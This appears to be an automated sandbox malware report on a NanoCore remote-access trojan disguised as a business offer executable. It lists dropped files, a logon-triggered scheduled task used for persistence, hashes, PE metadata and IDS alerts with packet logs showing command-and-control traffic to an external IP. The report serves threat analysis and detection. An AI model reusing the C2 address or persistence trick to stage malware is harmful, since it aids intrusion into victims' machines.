Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.1820753864715225
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGXItn:cbhK79lNQR/rydbz9I3YODOLNdq3l
MD5:	71FF5915210A631F190918E17AAB2BA3
SHA1:	D686501213D6021737874A2AABE17130FDB70BFC
SHA-256:	AB03E4461B1F19AD17C0D06CED6BAAEE7F85F4C2EFC263C61FB9B58208652460
SHA-512:	9E424DE335F59054FBEB68D0EB569437D08B0FD2FE80D54FCB4C373038EA809EEC8F7218A5665A098D3AFF29E94DB7DF315433AC565ACF5D914E8601263FDF62
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	data
Category:	dropped
Size (bytes):	928
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtw:Ik/lCrwfk/lCrwfk/lCrwfk/lCrw8
MD5:	CCB690520E68EE385ACC0ACFE759AFFC
SHA1:	33F0DA3F55E5B3C5AC19B61D31471CB60BCD5C96
SHA-256:	166154225DAB5FCB79C1CA97D371B159D37B83FBC0ADABCD8EBA98FA113A7A3B
SHA-512:	AC4F3CF1F8F460745D37E6350861C2FBCDDCC1BBDE0A48FB361BFBF5B1EBF10A05F798A72CE413FCA073FF8108955353DDBCBD9D50CED6CDAE231C67A28FDDA3
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:vy9t:vy9t
MD5:	63E7EB01B6D08052B3ED918341F332DB
SHA1:	6BA1077E2EC0D8E8C6466995B4067DBD0A2C2046
SHA-256:	408A4FAFE2D050997BF339892DDCD28B1555753B113B5F40250C5CCD39DBBDE6
SHA-512:	1FACEE73B8EC20A508DCB36CBA4C56278CF08A94243E42B4566D8879E34E5C2909C93A105D1F7B71189187B394DDB9600B1447579FC69EFCE148CDD86C43F5BE
Malicious:	true
Preview:	.P\|V...H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	data
Category:	modified
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	data
Category:	dropped
Size (bytes):	327432
Entropy (8bit):	7.99938831605763
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
MD5:	7E8F4A764B981D5B82D1CC49D341E9C6
SHA1:	D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
SHA-256:	0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
SHA-512:	880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	520704
Entropy (8bit):	7.472589051984974
Encrypted:	false
SSDEEP:	12288:X9ZObojf4hfvrauupl3CE3aXqoFTxWv0wIG6:PObaGeuuphCE3aXqopYvxIG6
MD5:	589F3EDCF4BCCADDE074ACC68279CAB1
SHA1:	C25F51FB32448D6323344CB2A07771A3908BF682
SHA-256:	F22D8DE0260841FBA148D55CE317AC6A8C27EF46A6CCFB6AD7390EEFE3D463BB
SHA-512:	4770B38D61F52AC3EFDE5C3F01E80C9556DABA3B663ED836B421D69BF244048A5468DB5F40374FABCE900201B445C4EC438CE9DDFEC56AF93B6634B0DE0F7042
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7[4`..............P.............N.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........x..tS...............0...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.472589051984974
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	COMPANY PROFILE AND DOCUMENTED OFFER.exe
File size:	520704
MD5:	589f3edcf4bccadde074acc68279cab1
SHA1:	c25f51fb32448d6323344cb2a07771a3908bf682
SHA256:	f22d8de0260841fba148d55ce317ac6a8c27ef46a6ccfb6ad7390eefe3d463bb
SHA512:	4770b38d61f52ac3efde5c3f01e80c9556daba3b663ed836b421d69bf244048a5468db5f40374fabce900201b445c4ec438ce9ddfec56af93b6634b0de0f7042
SSDEEP:	12288:X9ZObojf4hfvrauupl3CE3aXqoFTxWv0wIG6:PObaGeuuphCE3aXqopYvxIG6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7[4`..............P.............N.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x47fd4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60345B37 [Tue Feb 23 01:32:39 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7fcfc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x80000	0x1000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7dd54	0x7de00	False	0.769855154543	data	7.48398522287	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x80000	0x1000	0x1000	False	0.402587890625	data	5.00104802238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x80090	0x34c	data
RT_MANIFEST	0x803ec	0xc0f	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	DllImportAttribute.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	RegisterVB
ProductVersion	1.0.0.0
FileDescription	RegisterVB
OriginalFilename	DllImportAttribute.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-08:05:03.763021	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49737	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:11.396505	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49739	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:18.542782	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49742	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:27.404115	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:34.009030	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49745	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:38.806186	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49747	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:43.941001	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49748	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:51.479555	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49757	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:00.632376	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49766	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:05.570772	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49767	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:12.698135	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49768	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:19.896467	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49769	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:24.669992	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49770	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:30.667989	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49773	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:39.522382	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49774	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:44.697369	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49775	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:51.903108	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49776	3365	192.168.2.4	185.140.53.139

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:05:03.464538097 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:03.691986084 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:03.692136049 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:03.763020992 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.013252974 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.014693975 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.140037060 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.191706896 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.270272970 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.271231890 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.467181921 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.518924952 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.547051907 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.795355082 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.875582933 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.875617981 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.875766039 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.877470970 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877494097 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877506018 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877518892 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877538919 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877557039 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877609015 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.877630949 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.880585909 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.885013103 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.887480974 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.959489107 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080483913 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080521107 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080585003 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080602884 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080600977 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080634117 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080647945 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080684900 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080734968 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.087686062 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.087714911 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.087807894 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.089036942 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.089127064 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.089201927 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.090498924 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.090585947 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.090980053 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.091140985 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.091161013 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.091203928 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.091229916 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.092380047 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.092427969 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.092456102 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.092468977 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.092485905 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.092499018 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.093457937 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.093478918 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.093523979 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.093544960 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.094048977 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.094121933 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.094228983 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.094279051 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.096194983 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.096275091 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.205127954 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.295584917 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.296487093 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.296525002 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.296572924 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.297065973 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297141075 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.297440052 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297486067 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297524929 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297550917 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.297560930 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297605038 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.300390959 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.300493956 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.300546885 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.311549902 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.311610937 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.311672926 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.312277079 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.312319040 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.312360048 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.313178062 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.313220024 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.313266993 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.314224005 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.314265013 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.314409018 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.327245951 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327297926 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327336073 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327352047 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.327377081 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327418089 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327460051 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.327536106 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327603102 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.330425978 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.330470085 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.330532074 CET	49737	3365	192.168.2.4	185.140.53.139
